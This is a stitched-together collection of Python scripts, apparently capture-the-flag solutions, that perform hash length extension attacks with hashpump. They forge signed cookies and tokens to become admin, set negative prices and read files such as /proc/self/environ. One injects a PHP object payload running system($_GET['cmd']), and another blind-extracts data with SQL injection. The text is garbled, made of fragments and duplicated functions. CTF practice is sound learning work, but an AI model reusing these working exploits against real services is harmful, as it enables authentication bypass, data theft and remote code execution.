def playground():
key = make_key()
message = 'hello, world'
s1 = sign(message, key)
#s2 = sign(message + ' foo', key)
def thing(message, signature):
if check(message, signature, key):
print 'This was signed by me :)'
else:
print 'This was not signed by me >:( '
# correctly determines when message was signed with key
thing(message, s1)
# detects when you modified the message
thing(message + ' give me money!', s1)
# doesn't detect modifed message when using length extension attack with known key length
s2, modified_message = hashpump(s1, message, ' foo', len(key))
thing(modified_message, s2)
# brute force the key length
for n in xrange(8, 32):
s2, modified_message = hashpump(s1, message, ' foo', n)
thing(modified_message, s2)
def modify(o, key_len): split = '&sign=' index = o.find(split) signature = o[index + len(split):] message = o[:index] new_signature, modified_message = hashpump(signature, message, '&price=1', key_len) return modified_message + split + new_signature
def exploit():
p = None
while p == None:
p = fast_challenge()
p.recvline_contains('-----------------------------------') # wait motd
p.sendline('1') # Pick oranges
p.sendline('1') # 1 onrage
item, checksum = p.recvline_startswith('num=').split('-----', 1)
print "[+] hash = %s" % checksum
print "[+] item = %s" % item
for length in range(16, 0, -1):
print '[*] Trying with length = %d' % length
new_hash, value = hashpump(checksum, item, '&price=-10000000', length)
payload = '%s-----%s' % (value, new_hash)
print '[+] payload = %s' % repr(payload)
p.sendline('2')
p.sendline(payload)
if success_to_buy_or_not(p):
break
p.sendline('4') # flag?
print
print p.recvline_contains('the flag is').split(' ', 4)[-1]
print
p.close()
def exploit():
p = None
while p == None:
p = fast_challenge()
p.recvline_contains('-----------------------------------') # wait motd
p.sendline('1') # Pick oranges
p.sendline('1') # 1 onrage
item, checksum = p.recvline_startswith('num=').split('-----', 1)
print "[+] hash = %s" % checksum
print "[+] item = %s" % item
for length in range(16, 0, -1):
print '[*] Trying with length = %d' % length
new_hash, value = hashpump(checksum, item, '&price=-10000000', length)
payload = '%s-----%s' % (value, new_hash)
print '[+] payload = %s' % repr(payload)
p.sendline('2')
p.sendline(payload)
if success_to_buy_or_not(p):
break
p.sendline('4') # flag?
print
print p.recvline_contains('the flag is').split(' ', 4)[-1]
print
p.close()
def main():
nc = Netcat('140.112.31.96', 10154)
nc.read_until('>')
nc.write('2\n')
nc.read_until('>')
nc.read_until('>')
nc.write('1\n')
token = nc.read_until('>')
token = token.split('Token: ')[1].split('===')[0][:-1]
ori_data = '&BALSN_Coin=1'
app_data = '&BALSN_Coin=100000000000'
is_invalid = ''
length = 44
while 'Here is your flag!' not in is_invalid:
nc.write('3\n')
nc.read_until('>')
nc.read_until('>')
tmp = hashpumpy.hashpump(token, ori_data, app_data, length)
nc.write(base64.b64encode(tmp[1].split('Coin=', 1)[1]) + '\n')
nc.read_until('>')
nc.write(tmp[0] + '\n')
is_invalid = nc.read_until('>')
if 'Here is your flag!' in is_invalid:
print is_invalid.split('Here is your flag!')[1][1:].split(
'\n===')[0]
exit(1)
length += 1
if length > 54:
break
exit(0)
def pwn_aarhus():
base_url = 'http://{}:{}/'.format(HOST, PORT)
oracle = AarhusOracle()
pwner = CBCOraclePwner(oracle, verbose=True, block_size=8, nesting_level=3)
s = requests.session()
s.post(base_url + 'login/', data={'username': '******', 'password': '******'})
cookie = s.cookies['auth']
print("[+] got cookie: {}".format(cookie))
ct_1 = base64.b64decode(cookie, altchars=b'-_')
print("[+] got encrypted message 1: {}".format(hexlify(ct_1).decode()))
pt_1 = pwner.decrypt_unpad_msg(ct_1)
print("[+] got tagged plaintext: {}".format(pt_1))
tag_size = 16
mac, original_data = pt_1[:tag_size], pt_1[tag_size:]
# print("mac", mac)
# print("original_data", original_data)
extension = b'&username=almighty_administrator&is_admin=of_course'
print("[+] doing length extension with: {}".format(extension))
new_mac, new_msg = hashpump(hexlify(mac), original_data, extension, 16)
new_mac = unhexlify(new_mac)
print("[+] got new mac: {}".format(new_mac))
print("[+] for message: {}".format(new_msg))
new_pt = new_mac + new_msg
new_ct = pwner.encrypt_pad_msg(new_pt)
print("[+] encrypted new message: {}".format(hexlify(new_ct).decode()))
del s.cookies['auth']
s.cookies['auth'] = base64.b64encode(new_ct, altchars=b'-_').decode()
res = s.get(base_url + 'flag/')
m = re.search(r'(flag|FLAG)\{[^}]+\}', res.text)
assert (m)
flag = m.group(0)
print("[+] recovered flag:")
print(flag)
def main():
hex_digest = "571580b26c65f306376d4f64e53cb5c7"
original_data = "adminadmin"
data_to_add = "aaaaa"
key_length = 15
md5, password = hashpumpy.hashpump(hex_digest, original_data, data_to_add, key_length)
print("New Md5: {}, Original+Payload: {}".format(md5, password))
def pump_hash(add):
hexdigest = "4e4cd23864dadbe92508e28c30912f5f46ea550a073ac3e0164305fe6006b69d"
original_data = "username=admin"
data_to_add = add
key_length = 32
res = hashpumpy.hashpump(hexdigest, original_data, data_to_add, key_length)
cookie = res[1] + "-" + res[0]
return cookie
def hashattack(s):
s = unquote(s)
header, payload, signature = s.split(".")
#signature_new, payload_new = hashpumpy.hashpump(b64decode(signature), b64decode(header) + "." + b64decode(payload), "&isAdmin=true", 8)
signature_new, payload_new = hashpumpy.hashpump(b64decode(signature),
b64decode(payload),
"&isAdmin=true", 8)
return quote(header + "." + b64encode(payload_new) + "." +
b64encode(signature_new))
def main():
hex_digest = "571580b26c65f306376d4f64e53cb5c7"
original_data = "adminadmin"
data_to_add = "aaaaa"
key_length = 15
md5, password = hashpumpy.hashpump(hex_digest, original_data, data_to_add,
key_length)
print("New Md5: {}, Original+Payload: {}".format(md5, password))
def get_flag(sign):
string0="scan"
string1="read"
a, b = hashpumpy.hashpump(sign,string0,string1,39)
print(a,"\n",b)
cookie={"action":str(b)[2:-1].replace("\\x","%"),"sign":a}
p=req.get(url+"/De1ta?param=/proc/self/cwd/flag.txt",cookies=cookie)
return(p.content.decode('utf-8'))
def get_admin_cookie(data, sig):
data_to_add = ";username="******";secret=" + admin_secret + ";"
for i in range(8, 15):
(new_sig, new_data) = hashpump(sig.hex(), data, data_to_add, i)
b64_new_data = b64encode(new_data).decode('utf-8')
b64_new_sig = b64encode(binascii.unhexlify(new_sig)).decode('utf-8')
cookie = b64_new_data + "." + b64_new_sig
resp = requests.get(url + "/admin", cookies={"auth": cookie})
if resp.status_code == 200:
return str(cookie)
break
def webre(): #py2
url = 'http://web.jarvisoj.com:32778/'
sha = '3a4727d57463f122833d9e732f94e4e0'
string0 = ';"tseug":5:s'
string1 = ';"nimda":5:s'
for i in range(15):
digest, message = hashpumpy.hashpump(sha, string0, string1, i)
payload = {'role': urllib.quote(message[::-1]), 'hsh': digest}
#payload ={'role':(message[::-1]), 'hsh':digest}
print i, payload
html = requests.get(url, cookies=payload).text #提交答案
if 'Welcome' in html:
print html
def run(args):
j, i = args
s.post('http://200.200.200.108/login_chk.php', data={'id': 'guest', 'pw': 'guest'})
r = s.get("http://200.200.200.108/?p=read.php&no=" + quote(original))
payload = "\n AND 0 OR (ord(reverse(lpad((SELECT LENGTH(F14G) FROM FlagPart1),%d,space(1))))&%d)" % (j + 1, 1 << i)
digest = s.cookies['integrity']
digest, message = hashpump(digest, original, payload, len(key))
del s.cookies['integrity']
s.cookies['integrity'] = digest
r = s.get('http://200.200.200.108/?p=read.php&no=' + quote(message))
result = 'do our best' in r.text
del s.cookies['integrity']
return result
def getflag(host, port):
wc = WebChecker(str(host), str(port))
wc.register()
cookies = wc.login()
gg = hashpump(cookies['user_cookie'], wc.username, 'vip',
int(cookies['secretkey_length']))
cookies['user_cookie'] = gg[0]
cookies['username'] = gg[1].encode('hex')
se = req.session()
url = 'http://%s:%s/' % (host, port)
rs = se.get(url + 'user', cookies=cookies)
dom = PQ(rs.text)
flag = dom("div.alert.alert-success")
flag = PQ(flag).text().strip()
print flag
def forge_stuff(salt_length):
with open("firmware.bin", "r") as fh:
original_data = fh.read()
with open("firmware.sig", "r") as fh:
original_sig = fh.read()
data_to_add = "\ncat /flag"
result = hashpump(original_sig, original_data, data_to_add, salt_length)
with open("payload.sig", "w") as fh:
fh.write(result[0])
with open("payload.bin", "wb") as fh:
fh.write(result[1])
def attack():
url = 'http://web.jarvisoj.com:32778/'
old_cookie = '3a4727d57463f122833d9e732f94e4e0'
str1 = 's:5:"guest";'
str2 = 's:5:"admin";'
str1 = str1[::-1] #倒过来,这道题要role的值反过来求md5
str2 = str2[::-1]
for i in range(1, 20): #用于爆破salt的长度
new_cookie, message = hashpumpy.hashpump(old_cookie, str1, str2, i)
payload = {
'role': urllib.parse.quote(message[::-1]),
'hsh': new_cookie
} #quote()可以把 \x00 变成 %00
ans = requests.get(url, cookies=payload)
print(i)
print(ans.text)
if 'welcome' in ans.text:
print(ans.text)
def gogo_power_ranger ( key_length, A, B ) :
A.sendline(ID + '||' + N + '||' + sha_it_up(ID + '||' + N))
A.recvuntil("You should send your ID and a random string to me: ")
Ns, trash = A.recvline().split('||')
B.sendline(ID + '||' + Ns + '||' + sha_it_up(ID + '||' + Ns))
B.recvuntil('You should send your ID and a random string to me: ')
trash, mac = B.recvline().split('||')
mac = mac.decode('base64').encode('hex')
(h, s) = hashpump(h, ID + '||' + Ns + '||login', '||printflag', i)
h = base64.b64encode(h.decode('hex'))
A.sendline(base64.b64encode(s) + '||' + h)
print(base64.b64encode(s) + '||' + h)
power_ranger = A.recvline()
power_ranger = A.recvline()
if 'Integrity error' not in power_ranger:
flag.write(A.recvall())
def ciscn(self):
rs = self.session.get(self.url + 'test')
dom = PQ(rs.text)
form = dom("form")
token = str(
PQ(form[0])("input[name=\"%s\"]" %
self.csrfname).attr("value")).strip()
rs = self.session.post(self.url + 'test',
data={
self.csrfname: token,
'parameter': 'hhhhhhhhhhhh'
})
md5_get = rs.headers['md5']
length = rs.headers['length']
result = hashpumpy.hashpump(md5_get, "hhh", "asd", int(length))
parameter = result[1].encode('string-escape').decode('unicode-escape')
md5 = result[0].encode('string-escape').decode('unicode-escape')
rs = self.session.post(self.url + 'test',
data={
self.csrfname: token,
'md5': md5,
'parameter': parameter
})
flag = rs.text
if re.search(r'ciscn{.*}', flag):
print re.search(r'ciscn{.*}', flag).group()
return re.search(r'ciscn{.*}', flag).group()
else:
return False
def forge_cookie(sample_cookie, hash):
clear()
print("[*] Forging admin cookie...")
b64_data, b64_sig = sample_cookie.split('.')
data = b64decode(b64_data).decode() # Cookie data
sig = b64decode(b64_sig).hex() # Signature
append = f';username=admin;secret={hash};' # Data to append
for key_length in range(8, 15): # Secret is between 8 and 15 bytes
# Use hashpump to append our data to the cookie, without changing the signature
new_sig, msg = hashpump(sig, data, append, key_length)
# Generate cookie
cookie_data = f"{b64encode(msg).decode()}.{b64encode(unhexlify(new_sig)).decode()}"
cookie = {'auth': cookie_data}
# Check if cookie is valid for admin endpoint
if verify_cookie(cookie):
return cookie
"""
import re
from urllib import quote
original_data = ';"tseug":5:s'
original_hash = '3a4727d57463f122833d9e732f94e4e0'
append_data = ';"nimda":5:s'
for i in range(32):
hexdigest = original_hash.encode(
'hex'
) # hexdigest(str): Hex-encoded result of hashing key + original_data.
original_data = original_data # original_data(str): Known data used to get the hash result hexdigest.
data_to_add = append_data # data_to_add(str): Data to append
key_length = i # key_length(int): Length of unknown data prepended to the hash
digest, message = hashpumpy.hashpump(
hexdigest, original_data, data_to_add, key_length
) # hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message)
# print digest, message
cookie = {'hsh': digest, 'role': 's%3A5%3A"admin"%3B'}
url = 'http://web.phrack.top:32785/'
try:
r = requests.get(url, cookies=cookie)
print message
if r.text.find('Your flag is') > 0:
finded = True
print r.text
break
import hashpumpy
import base64
print("Welcome to the Hash Extension brute force tool")
print("a tool for The Information Technology Syndicate\n")
print("Original Digest (in hex):")
hexdigest = raw_input()
print("Original Data (in ASCII):")
original_data = raw_input()
print("Data to Add (in ASCII):")
data_to_add = raw_input()
print("Starting Key Length:")
key_length_start = int(raw_input())
print("Ending Key Length:")
key_length_end = int(raw_input())+1
for key_length in range (key_length_start, key_length_end):
out = hashpumpy.hashpump( hexdigest, original_data, data_to_add, key_length)
digest = out[0]
message = out[1]
query = base64.b64encode(message)
newKey = base64.b64encode(digest.decode("hex"))
print("--------------------------------")
print("Key len:" +str(key_length))
print("Query: "+message)
print("Digest: "+digest)
print("<query base64> <new digest>:")
print(query+" "+newKey)
"""
import hashlib
import socket
import argparse
from binascii import unhexlify
import hashpumpy
p = argparse.ArgumentParser()
p.add_argument('-k', '--key-length', required=True, type=int)
p.add_argument('-t', '--token', required=True)
p.add_argument('-p', '--open-port', required=True, type=int)
p.add_argument('-H', '--host', default="::1")
p.add_argument('-P', '--host-port', type=int, default=8008)
args = p.parse_args()
# 2 hex digits for each byte
ds = hashlib.sha512().digest_size * 2
given_digest = args.token[:ds]
original_data = unhexlify(args.token[ds:])
append_data = unhexlify(hex(args.open_port)[2:])
digest, payload = hashpumpy.hashpump(given_digest, original_data, append_data,
args.key_length)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect((args.host, args.host_port))
s.sendall(unhexlify(digest) + payload)
def oldSign(url, data):
args = {'a': 'sign',
'm': 'old',
'd': data}
return visit(url, urlencode(args))
def newVerify(url, data, signature):
args = {'a': 'verify',
'm': 'new',
'd': data,
's': signature}
return visit(url, urlencode(args))
url = "http://95.138.166.219/"
base_msg = "ayylmao"
extend_msg = "get flag"
i_key_md5 = oldSign(url, "\x36"*blocksize + base_msg).decode('hex')
print "[+]Got md5(i_key_pad + '%s') = %s" % (base_msg, i_key_md5.encode('hex'))
res = hashpumpy.hashpump(i_key_md5.encode('hex'), base_msg, extend_msg, blocksize)
i_key_md5_extend = res[0]
forged_msg = res[1]
print "[+]Got md5(i_key_pad + '%s') = %s" % (forged_msg, i_key_md5_extend)
o_key_md5 = oldSign(url, "\x5C"*blocksize + i_key_md5_extend.decode('hex'))
print "[+]Got md5(o_key_pad + md5(i_key_pad + forged_msg).digest()) = %s" % o_key_md5
print "[+]Verification response: [%s]" % newVerify(url, forged_msg, o_key_md5)
import sys
try:
import hashpumpy
except ImportError:
print "Missing required hashpumpy library"
print "Try 'pip install hashpumpy'"
sys.exit(1)
# the initial cookie given to us by the server
data = 'b:1;'
# the valid signature given to us by the server
digest = '2141b332222df459fd212440824a35e63d37ef69'
# our serialized PHP object
add = '\n\x4f\x3a\x34\x3a\x22\x50\x6f\x73\x74\x22\x3a\x33\x3a\x7b\x73\x3a\x38\x3a\x22\x00\x2a\x00\x74\x69\x74\x6c\x65\x22\x3b\x73\x3a\x30\x3a\x22\x22\x3b\x73\x3a\x37\x3a\x22\x00\x2a\x00\x74\x65\x78\x74\x22\x3b\x73\x3a\x30\x3a\x22\x22\x3b\x73\x3a\x31\x30\x3a\x22\x00\x2a\x00\x66\x69\x6c\x74\x65\x72\x73\x22\x3b\x61\x3a\x31\x3a\x7b\x69\x3a\x30\x3b\x4f\x3a\x36\x3a\x22\x46\x69\x6c\x74\x65\x72\x22\x3a\x32\x3a\x7b\x73\x3a\x31\x30\x3a\x22\x00\x2a\x00\x70\x61\x74\x74\x65\x72\x6e\x22\x3b\x73\x3a\x35\x3a\x22\x2f\x2e\x2a\x2f\x65\x22\x3b\x73\x3a\x37\x3a\x22\x00\x2a\x00\x72\x65\x70\x6c\x22\x3b\x73\x3a\x32\x30\x3a\x22\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x22\x63\x6d\x64\x22\x5d\x29\x22\x3b\x7d\x7d\x7d'
# assume the keylength hasn't changed; if signature is rejected other lengths can be tried
keylen = 8
# get our exploit cookie and its valid signature
sig, message = hashpumpy.hashpump(digest, data, add, keylen)
def urlencode(s):
return ''.join('%%%02x'%ord(c) for c in s)
print sig
print urlencode(message)
#!/usr/bin/env python3
import hashpumpy, requests, base64
# login as guest
user_cookie = 'NmJjYjljOTE1NTk3NWE1M2U5NTFiMGI1MGYxMzc0ODAjbmFtZT1ndWVzdCZhZG1pbj0w'
sig, serial = base64.b64decode(user_cookie).decode().split('#')
new_sig, new_serial = hashpumpy.hashpump(sig, serial.encode(), '&admin=1',
len(sig))
new_cookie = base64.b64encode(new_sig.encode() + b'#' + new_serial).decode()
r = requests.get('https://hackme.inndy.tw/login2/',
cookies={'user': new_cookie})
print(r.text)
r = remote('bamboofox.cs.nctu.edu.tw', 30000)
r.recvuntil(': ')
r.recvline().strip()
r.recvuntil(': ')
auth = r.recvline().strip()
# input
msg = 'user=someone'
append_str = 'user=admin'
hmac = auth
len_of_key = 40
result = hashpump(auth, msg, append_str, 40)
r.recvuntil(': ')
r.sendline(b64e(result[1]))
r.recvuntil(': ')
r.sendline(result[0])
print r.recv(4096)
import hashpumpy
import hashlib
key = b"KEY" * 4
original_data = b"ORIG" * 4
data_to_add = b"system('/bin/sh')"
for algorithm in (hashlib.md5, hashlib.sha1, hashlib.sha256, hashlib.sha512):
original_digest = algorithm(key + original_data).hexdigest()
new_digest, new_data = hashpumpy.hashpump(original_digest, original_data,
data_to_add, len(key))
verify_digest = algorithm(key + new_data).hexdigest()
assert new_digest == verify_digest
# function to keep reading the serial until completion (final character is >>)
def read_terminal():
end_symbol= '>>'
buff =''
while end_symbol not in buff:
buff +=str(ser.readline().decode('utf-8'))
return buff
# print the first prompt
print(read_terminal())
# write a command to require the cat file and the passwd file, no prompt answer because the value is incorrect
#ser.write(str.encode("#fac1d7b8276cf5c2907dcfa92d5f48607fde0db8#cat.txt:passwd\r\n"))
#print(read_terminal())
for i in range(1,10):
hash_value,txt = hashpumpy.hashpump('96103df3b928d9edc5a103d690639c94628824f5', 'cat.txt', ':passwd',i)
#print('message = ',type(txt)) # message is of type byte
#print('hash = ',type(hash_value)) #i hash of type string
#All strings are converted in one long command of bytes format to be sent as serial write command
print("Command sent for key length = "+ str(i))
print(hash_value.encode('utf-8') + '#'.encode('utf-8') + txt +'\r\n'.encode('utf-8'))
#encode everything to type "BYTE" before sending over the command line to the UART
ser.write((hash_value + '#').encode('utf-8') + txt +'\r\n'.encode('utf-8'))
print(read_terminal())
import hashpumpy
import urllib2
import urllib
url = "http://178.62.34.76/getAttachment/"
origin_sig = "beb2e68c628653c72abcb388b078cfda"
origin_data = "file.txt"
key_length = 32
while 1:
append_data = '?/'+raw_input("path : ")
new_signature,new_data = hashpumpy.hashpump(origin_sig,origin_data,append_data,key_length)
print 'new signature : %s'%(new_signature)
print 'new data : %s'%(new_data).encode('hex')
req = urllib2.Request(url+urllib.quote_plus(urllib.quote_plus(new_data)))
req.add_header('X-Signature',new_signature)
res = urllib2.urlopen(req)
print res.read()
'''
path : ../../.htaccess
new signature : 77a6762d005d965a0ee69202bd67ca28
new data : 66696c652e7478748000000000000000000000000000000040010000000000003f2f2e2e2f2e2e2f2e6874616363657373
RewriteEngine on
RewriteRule simple-php-captcha.php simple-php-captcha.php [L]
RewriteRule showInformation/(.+) /showInformation.php?informationID=$1 [L]
RewriteRule infoSubmit /informationSubmit.php [L]
RewriteRule notConfirmedInformation/(.+) /notConfirmedInformation.php?informationID=$1 [L]
#!/usr/bin/env python
import hashpumpy
import os
#file = str(',' + raw_input('> '))
file = ',/proc/self/environ';
for i in range(1,256):
new_hash, msg = hashpumpy.hashpump('48b49f65a86cd617e5c7423d23a67738c4057d06','filelocation,list.txt', file ,i)
hexfile = msg.encode('hex')
num1 = 0
num2 = 0
for i in new_hash:
num1 += ord(i)
for i in hexfile:
num2 += ord(i)
magic = num1 * num2 - num1 - num2
'''
print 'Magic:', magic
print 'File:', hexfile
print 'Hash:', new_hash
'''
os.system('curl localhost:17565/view.php --data "magic={}&file={}&mac={}" >> data'.format(magic,hexfile,new_hash))
from pwn import *
from hashpumpy import hashpump
mac, ext = hashpump('7062c015708b70b81e352f4fbd962ceb', 'icanbeatmuctf', 'givemetheflag', 14)
r = remote('127.0.0.1', 10078)
r.recvuntil('Your input :')
r.sendline(ext)
r.recvuntil('The signature :')
r.sendline(mac)
r.recvuntil('The flag is ')
print r.recv()
import os
import hashpumpy
dump = hashpumpy.hashpump('3b88e265e072d231ec37b67e92bea158', 'name=matesctf', '&role=admin', 12)
cookie = (dump[1]+"&sign="+dump[0]).encode('base64').replace("\n", "")
print cookie
url = "http://weblab02.matesctf.org/web200_c1c6afb055ad6ba7b9dbd3cf39e99633/user.php"
os.system("curl --header 'Cookie: token="+cookie+"' "+url)
server_data = r.json()
return server_data
# server_data = make_request(data)
# print(server_data)
# sys.exit()
signature = '77c635a441ad291897ff1b10cd20f3537ad8458d38295344275a4fe81c398594'
for i in range(1, 100):
new_signature, new_full_message = hashpump(signature, data['data_to_show'],
append_data, i)
_data = dict()
_data['signature'] = new_signature
_data['data_to_show'] = new_full_message
server_data = make_request(_data)
if server_data.get('error', None) is None:
print('KEY LENGTH: ', i)
print('Data Sent:', new_full_message)
print('Fake Signature:', new_signature)
print('Server Response:', server_data)
break
#libraries
p = remote('13.251.110.215', 10001)
p.recv()
# order Flag
p.sendline("2")
p.recvuntil("Item ID: ")
p.sendline("5")
# extract sign and payment from order
payment = p.recv()
sp = payment.find('&sign=')
sign = payment[sp + 6:]
sign = sign[:sign.find('\n')]
payment = payment[payment.find('product'):payment.find('&sign')]
for keylen in range(8, 32):
log.info('trying keylen=' + str(keylen))
n = hashpumpy.hashpump(sign, payment, '&price=1', keylen)
order = n[1] + "&sign=" + n[0]
p.sendline("3")
p.recvuntil("Your order:")
p.sendline(order)
p.recv(1000)
ret = p.recv(1000)
if ("Invalid" not in ret):
print(ret)
print(p.recv())
quit()
# This exploit creates a length extension of the message '6'
import hashpumpy
import socket
if __name__ == '__main__':
orig_data = '9'
orig_digest = 'a44ce5dbed666647c2d571c91d41385beb16784030e849efae5af7c80f77da0b5f8a6c45d2ab467d781d4b6ffc83edf9b00bebe83d36d92349c0e64a3064ef93'
append_data = '999999999999999999999999999999999999999999999999999'
sock = socket.socket()
sock.connect(('challenges.tamuctf.com', 8812))
sock.recv(1024)
for i in range(1, 1000):
print i
new_digest, new_data = hashpumpy.hashpump(orig_digest, orig_data, \
append_data, i)
print('New data: ' + new_data)
print('New hash: ' + new_digest)
sock.send((str(2) + '\n').encode())
sock.recv(1024) # receive options (doesn't matter)
sock.send(new_data + '\n')
sock.recv(1024) # receive options (doesn't matter)
sock.send(new_digest + '\n')
print sock.recv(1024).decode()
import hashpumpy
import requests
from base64 import *
data = {"author": "mrNobody", "note": "hacked"}
resp = requests.post("http://crypto.chal.csaw.io:5003/new", data=data).text
identifier = resp[19:].split(":")[0]
integrity = resp.split(":")[1][0:40]
decoded_identifier = b64decode(identifier)
identifier_suffix = "&admin=True&access_sensitive=True&entrynum=7"
for i in range(256):
new_integrity = hashpumpy.hashpump(integrity, decoded_identifier,
identifier_suffix, i)
resp = requests.post("http://crypto.chal.csaw.io:5003/view",
data={
"id":
b64encode(new_integrity[1].decode(
'unicode-escape').encode('unicode-escape')),
"integrity":
new_integrity[0]
}).text
if "flag" in resp:
print(resp.split("\n")[2].split(":")[2][1:])
print("secret length:", i)
break
import hashlib
import socket
import argparse
from binascii import unhexlify
import hashpumpy
p = argparse.ArgumentParser()
p.add_argument('-k', '--key-length', required=True, type=int)
p.add_argument('-t', '--token', required=True)
p.add_argument('-p', '--open-port', required=True, type=int)
p.add_argument('-H', '--host', default="::1")
p.add_argument('-P', '--host-port', type=int, default=8008)
args = p.parse_args()
# 2 hex digits for each byte
ds = hashlib.sha512().digest_size * 2
given_digest = args.token[:ds]
original_data = unhexlify(args.token[ds:])
append_data = unhexlify(hex(args.open_port)[2:])
digest, payload = hashpumpy.hashpump(given_digest,
original_data,
append_data,
args.key_length)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect((args.host, args.host_port))
s.sendall(unhexlify(digest) + payload)
def get_md5(msg):
plain = SECRET + msg
#print("doing an md5 of %s" % plain)
plain = plain.encode()
return md5(plain).hexdigest()
msg_from_server = "data"
hash_from_server = get_md5(msg_from_server)
print(
"Server: I give you a message and the MAC md5(secret+'%s').\ndata: %s\nMAC: %s\n"
% (msg_from_server, msg_from_server, hash_from_server))
this_I_want_to_add = "append"
msg_to_forge = msg_from_server + this_I_want_to_add
forged_hash, forged_msg = hashpump(hash_from_server, msg_from_server,
this_I_want_to_add, len(SECRET))
print(
"Client: I give you a message and I can spoof the MAC.\nmy data: %s\nspofed MAC: %s"
% (msg_to_forge, forged_hash))
print("what I send as data")
hexdump(forged_msg)
msg_server_check = SECRET + str(forged_msg)
hash_server_calculats_with_secret = md5(msg_server_check).hexdigest()
print(
"Server: I received your message. I try to check you MAC md5(SECRET+yourdata). Result:\n%s"
% hash_server_calculats_with_secret)
import hashpumpy
import hashlib
key = b"KEY"*4
original_data = b"ORIG"*4
data_to_add = b"system('/bin/sh')"
for algorithm in (hashlib.md5, hashlib.sha1, hashlib.sha256, hashlib.sha512):
original_digest = algorithm(key + original_data).hexdigest()
new_digest, new_data = hashpumpy.hashpump(original_digest, original_data, data_to_add, len(key))
verify_digest = algorithm(key + new_data).hexdigest()
assert new_digest == verify_digest
